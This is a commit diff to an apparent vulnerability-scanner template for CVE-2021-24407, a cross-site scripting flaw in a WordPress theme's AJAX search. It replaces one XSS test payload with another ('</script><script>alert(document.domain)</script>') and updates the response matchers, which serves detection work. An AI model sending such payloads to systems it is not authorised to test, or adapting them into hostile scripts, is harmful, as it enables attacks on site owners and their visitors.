Update CVE-2021-24407.yaml
parent
7a88129ee8
commit
ac93a8acaf
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24407
|
||||
tags: cves,cve2021,wordpress,xss
|
||||
tags: cves,cve2021,wordpress,xss,wp-theme
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -18,20 +18,20 @@ requests:
|
|||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=tie_ajax_search&query[]=<svg+onload=alert(document.domain)>
|
||||
action=tie_ajax_search&query[]=</script><script>alert(document.domain)</script>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '<svg+onload=alert(document.domain)>'
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'Content-Type: text/html'
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
Loading…
Reference in New Issue